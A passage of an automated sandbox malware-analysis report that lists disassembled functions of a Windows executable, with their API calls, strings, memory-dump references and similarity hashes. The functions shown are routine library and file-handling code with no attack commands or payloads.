                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Message$DispatchTranslate
                                                                                                                • String ID:
                                                                                                                • API String ID: 1706434739-0
                                                                                                                • Opcode ID: ff4bbb0ee11cb8d23436d36dc4f1afe6452884652fce5e061bdfbf09a135d43b
                                                                                                                • Instruction ID: dce87cc10bfe5041a6df20c361f3a06625ccd264afa43fff3afcf659aab450c6
                                                                                                                • Opcode Fuzzy Hash: ff4bbb0ee11cb8d23436d36dc4f1afe6452884652fce5e061bdfbf09a135d43b
                                                                                                                • Instruction Fuzzy Hash: C3E09232210140ABD7615B76AC89E7F77ACFF91B02F05082EF502C5150C7689C428AA9
                                                                                                                Function 0047B9B4 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 174COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 0047B9B9
                                                                                                                  • Part of subcall function 0047A66E: __EH_prolog.LIBCMT ref: 0047A673
                                                                                                                Strings
                                                                                                                • Language set: Primary = %d, Secondary = %d, xrefs: 0047B9E2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: Language set: Primary = %d, Secondary = %d
                                                                                                                • API String ID: 3519838083-4264154087
                                                                                                                • Opcode ID: 216a2acae7aef0f33b2617180a7c08b81214485d474aa1e678252c03f0c37f59
                                                                                                                • Instruction ID: dee9fd5dd59b1262cc13e65939659595cd697f9fac8810049e0308c11502762b
                                                                                                                • Opcode Fuzzy Hash: 216a2acae7aef0f33b2617180a7c08b81214485d474aa1e678252c03f0c37f59
                                                                                                                • Instruction Fuzzy Hash: 4C61E1726001049FCB10EF59C891EEEB7B1EF58310B18C06FE919A73A1DB38AE44CB94
                                                                                                                Function 0046DA88 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 106COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: --@@
                                                                                                                • API String ID: 3519838083-3308024793
                                                                                                                • Opcode ID: 2ea4cac854f786cabf418f287b1bb0631b3a4079049840bd552f9c6e967cd7d0
                                                                                                                • Instruction ID: 9ac3a6a2b375bd2f3583f9d65706c1f659bdcc1bdcb8e2b34007ee0ad129e0d2
                                                                                                                • Opcode Fuzzy Hash: 2ea4cac854f786cabf418f287b1bb0631b3a4079049840bd552f9c6e967cd7d0
                                                                                                                • Instruction Fuzzy Hash: 29419375800749EBCB05EBA5C845FEEBBB8EF14314F04405EB416A3281DB78A748CB65
                                                                                                                Function 0040414B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 93COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 00404150
                                                                                                                  • Part of subcall function 004044F4: __EH_prolog.LIBCMT ref: 004044F9
                                                                                                                  • Part of subcall function 004044F4: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 004045B6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$QueryValue
                                                                                                                • String ID: ***!!!***@@
                                                                                                                • API String ID: 179822093-661900980
                                                                                                                • Opcode ID: c1de74e39bb8087cf9383929cfa2b1199a87e5bf0d80d0620a2d18a8e130d69d
                                                                                                                • Instruction ID: b9e3c9737692fe52a187b19bcdd2edbaff5e44d939a0c7dcbb453eb1b618f4bf
                                                                                                                • Opcode Fuzzy Hash: c1de74e39bb8087cf9383929cfa2b1199a87e5bf0d80d0620a2d18a8e130d69d
                                                                                                                • Instruction Fuzzy Hash: 20311BB5D0025ADECF04EF95C985AEEBBB4FB64304F14402FE611A2281D7785B85CBA5
                                                                                                                Function 0047F21F Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 85COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 0047F224
                                                                                                                  • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                                                  • Part of subcall function 0046DA88: __EH_prolog.LIBCMT ref: 0046DA8D
                                                                                                                  • Part of subcall function 004C61B3: __EH_prolog.LIBCMT ref: 004C61B8
                                                                                                                  • Part of subcall function 0047A66E: __EH_prolog.LIBCMT ref: 0047A673
                                                                                                                Strings
                                                                                                                • Run client data event: , xrefs: 0047F2A9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$IncrementInterlocked
                                                                                                                • String ID: Run client data event:
                                                                                                                • API String ID: 2670639370-676025092
                                                                                                                • Opcode ID: 91fef82a63723f7f377bf9027ec307932a14c1871ee3593f6a628888841b2dea
                                                                                                                • Instruction ID: ca018967f3585156ccab3e5e7745356f872fd8c5a792b7ff8c1e00e43b6a3b8e
                                                                                                                • Opcode Fuzzy Hash: 91fef82a63723f7f377bf9027ec307932a14c1871ee3593f6a628888841b2dea
                                                                                                                • Instruction Fuzzy Hash: B6319575900248EFCB14EBA4C986FEE7BA8AF15344F04416EF805A7292D7385F48C795
                                                                                                                Function 004C67E2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 73COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 004C67E7
                                                                                                                  • Part of subcall function 004D4878: TlsGetValue.KERNEL32(005265C0,00000000,00000100,004D374A,004D317A,004C9C8D,00000100,004C9C26,?,?,00000100,00000000,?), ref: 004D48B7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prologValue
                                                                                                                • String ID: $aR
                                                                                                                • API String ID: 3700342317-965106960
                                                                                                                • Opcode ID: 17d163ec67b60d62d2b55e952e23a184c2069489cfb9e2b06ddc5e0323897b94
                                                                                                                • Instruction ID: 0c0cf30b69844c62e14cd8862a4cb4d399ee87cfbf31c85da1f3a67f49a08b51
                                                                                                                • Opcode Fuzzy Hash: 17d163ec67b60d62d2b55e952e23a184c2069489cfb9e2b06ddc5e0323897b94
                                                                                                                • Instruction Fuzzy Hash: 17214476A01209EFCF41DF54C481BEE7BB9FF44358F01806AF815AB241C778AA44CBA4
                                                                                                                Function 0047A721 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 71COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 0047A726
                                                                                                                  • Part of subcall function 004C5707: CreateFileA.KERNEL32(00000000,80000000,00000000,0000000C,00000003,00000080,00000000,?,?,00000000), ref: 004C57E2
                                                                                                                  • Part of subcall function 004C5707: GetLastError.KERNEL32 ref: 004C57F4
                                                                                                                  • Part of subcall function 004C585E: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004C5879
                                                                                                                  • Part of subcall function 004C585E: GetLastError.KERNEL32(?), ref: 004C5886
                                                                                                                  • Part of subcall function 004C5901: FlushFileBuffers.KERNEL32(?,0047A7C1,?,00000001), ref: 004C590A
                                                                                                                  • Part of subcall function 004C5901: GetLastError.KERNEL32(00000000,?,00000001), ref: 004C5915
                                                                                                                  • Part of subcall function 004C5922: CloseHandle.KERNEL32(00000001,00000000,?,004C5679,?,?,004CDE5C,?,?,?,004A8EBA,00000004,00000000), ref: 004C5931
                                                                                                                  • Part of subcall function 004C5922: GetLastError.KERNEL32(00000000,004C5679,?,?,004CDE5C,?,?,?,004A8EBA,00000004,00000000), ref: 004C5956
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$File$BuffersCloseCreateFlushH_prologHandleWrite
                                                                                                                • String ID: ThN
                                                                                                                • API String ID: 1722101560-2830422598
                                                                                                                • Opcode ID: 5e8ecb4cf2e334177cc7e4abe5db696f3d3a67f3c651340ec4908bcbeeb1b8ee
                                                                                                                • Instruction ID: 00189b88981aa960947ce172797e1d39146f8fd293fe99c96172c1ad861633a2
                                                                                                                • Opcode Fuzzy Hash: 5e8ecb4cf2e334177cc7e4abe5db696f3d3a67f3c651340ec4908bcbeeb1b8ee
                                                                                                                • Instruction Fuzzy Hash: 57214776901618DFCF14EFA5C885AEDB7B1FF18314F10856EE012B32A1DB786A48CB24
                                                                                                                Function 0047B94C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetSystemDefaultLangID.KERNEL32(0047F21C,0047EC91,?,00000004,00000000,00000001), ref: 0047B985
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DefaultLangSystem
                                                                                                                • String ID: _tblErrorMessages
                                                                                                                • API String ID: 706401283-1976560367
                                                                                                                • Opcode ID: 902c286f601d5eae689c54cafe6f3628ede8c1e0ceecc499293eb5bc370a72e9
                                                                                                                • Instruction ID: 346606b756231b536953adf72d7b54d576af0992655c45f2cca79c78c9d2f5e8
                                                                                                                • Opcode Fuzzy Hash: 902c286f601d5eae689c54cafe6f3628ede8c1e0ceecc499293eb5bc370a72e9
                                                                                                                • Instruction Fuzzy Hash: 16F0E9F22154202ED611365DAC02FFE218CCF86314F14416BFA54D6291DB5C994383EE
                                                                                                                Function 004A24E0 Relevance: 3.3, APIs: 2, Instructions: 275COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c316a9602e4623095da9dfd54cf9e0d6acf79ee30604b10317fdb1c0597f63a6
                                                                                                                • Instruction ID: bf76858b1990c32746246190158fa3ec8d5d5e743f5932e50630ea11d1a7f067
                                                                                                                • Opcode Fuzzy Hash: c316a9602e4623095da9dfd54cf9e0d6acf79ee30604b10317fdb1c0597f63a6
                                                                                                                • Instruction Fuzzy Hash: 8CA1B0756057018FE320CF28D980BA7B3E5FFA5304F14492EE89AC7341EB78E8059B29
                                                                                                                Function 0049F810 Relevance: 3.2, APIs: 2, Instructions: 195COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • TlsGetValue.KERNEL32(0000001C,00000000,00000000,00000000,?,0049AF7F,00000000), ref: 0049F81A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Value
                                                                                                                • String ID:
                                                                                                                • API String ID: 3702945584-0
                                                                                                                • Opcode ID: 2b8b88667d06c803f98b7dc261c484fcb306df7f6fa4f83481945ea21d8f7932
                                                                                                                • Instruction ID: 1aeaa06c8df3684af671a8d8fda7723af0044c40e3557516b71e1c92725c94d8
                                                                                                                • Opcode Fuzzy Hash: 2b8b88667d06c803f98b7dc261c484fcb306df7f6fa4f83481945ea21d8f7932
                                                                                                                • Instruction Fuzzy Hash: CE5186B16057015AEB30AF799880B97F7E4FF98324F204B3FE46EC2681EB3458488759
                                                                                                                Function 0047A801 Relevance: 3.1, APIs: 2, Instructions: 112COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 0047A806
                                                                                                                  • Part of subcall function 004C6033: lstrlen.KERNEL32(?,?,00000000,004C5E52,005247C8,00403DCA,00000000,00403C1B,00000000,00000000,004019FC,?), ref: 004C6044
                                                                                                                • SetFileAttributesA.KERNEL32(00000000,00000080,?,?,0000005C,?,00000000,?,00000000,00000000), ref: 0047A8C7
                                                                                                                  • Part of subcall function 004C281A: __EH_prolog.LIBCMT ref: 004C281F
                                                                                                                  • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                                                  • Part of subcall function 004C5922: CloseHandle.KERNEL32(00000001,00000000,?,004C5679,?,?,004CDE5C,?,?,?,004A8EBA,00000004,00000000), ref: 004C5931
                                                                                                                  • Part of subcall function 004C5922: GetLastError.KERNEL32(00000000,004C5679,?,?,004CDE5C,?,?,?,004A8EBA,00000004,00000000), ref: 004C5956
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$AttributesCloseDecrementErrorFileHandleInterlockedLastlstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 1742860936-0
                                                                                                                • Opcode ID: 0ed311f827036211862ca8fc8b749643e372c0c094b1fb604e8566b9580dc102
                                                                                                                • Instruction ID: ccd50a9f3a6c29ef31feaec7ee8cdf20a60450543787713fc784431bb4390dcd
                                                                                                                • Opcode Fuzzy Hash: 0ed311f827036211862ca8fc8b749643e372c0c094b1fb604e8566b9580dc102
                                                                                                                • Instruction Fuzzy Hash: BF419D75900659EACB05EBA5C845FEEBB74EF14314F00812FE416B3281DB786A45CBAA
                                                                                                                Function 004C5707 Relevance: 3.1, APIs: 2, Instructions: 107fileCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004C5A33: __EH_prolog.LIBCMT ref: 004C5A38
                                                                                                                  • Part of subcall function 004C5A33: GetFullPathNameA.KERNEL32(?,00000104,?,?,?), ref: 004C5A56
                                                                                                                  • Part of subcall function 004C5A33: lstrcpyn.KERNEL32(?,?,00000104), ref: 004C5A65
                                                                                                                • CreateFileA.KERNEL32(00000000,80000000,00000000,0000000C,00000003,00000080,00000000,?,?,00000000), ref: 004C57E2
                                                                                                                • GetLastError.KERNEL32 ref: 004C57F4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateErrorFileFullH_prologLastNamePathlstrcpyn
                                                                                                                • String ID:
                                                                                                                • API String ID: 1034715445-0
                                                                                                                • Opcode ID: 6d38484deed9a40803fb6abaf1b54e397960bf1baa528ec21d3e07e475994efb
                                                                                                                • Instruction ID: 89fa6537c64a306c62f5a088e79b6758710ea596ac8f4686efb3338968ddd2ce
                                                                                                                • Opcode Fuzzy Hash: 6d38484deed9a40803fb6abaf1b54e397960bf1baa528ec21d3e07e475994efb
                                                                                                                • Instruction Fuzzy Hash: 9D312939A01B05DBEB649B15CC85FAF73A5AB80354F20852FE416CB2D0C678F9C48B58
                                                                                                                Function 004CAB71 Relevance: 3.1, APIs: 2, Instructions: 65windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 004CAB8D
                                                                                                                • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 004CABD7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessagePeek
                                                                                                                • String ID:
                                                                                                                • API String ID: 2222842502-0
                                                                                                                • Opcode ID: 215b89fe22961723de51274be0940137a498c8c9a333aba34d4a41fec9f83147
                                                                                                                • Instruction ID: bd634bf906d14818fa7c8b9dad07b23b1e4d82265597cd3d82aae38b259c628e
                                                                                                                • Opcode Fuzzy Hash: 215b89fe22961723de51274be0940137a498c8c9a333aba34d4a41fec9f83147
                                                                                                                • Instruction Fuzzy Hash: 21115E7530420DAFE7609E25AC84E2BB79DFB80799B00046EF64286201EB25AD158766
                                                                                                                Function 004D015D Relevance: 3.1, APIs: 2, Instructions: 64windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LoadMenuA.USER32(?,?), ref: 004D017A
                                                                                                                • DestroyMenu.USER32(00000000,?,?,?,?,?,?,?,?,00000000,00000000,?,?), ref: 004D01E1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
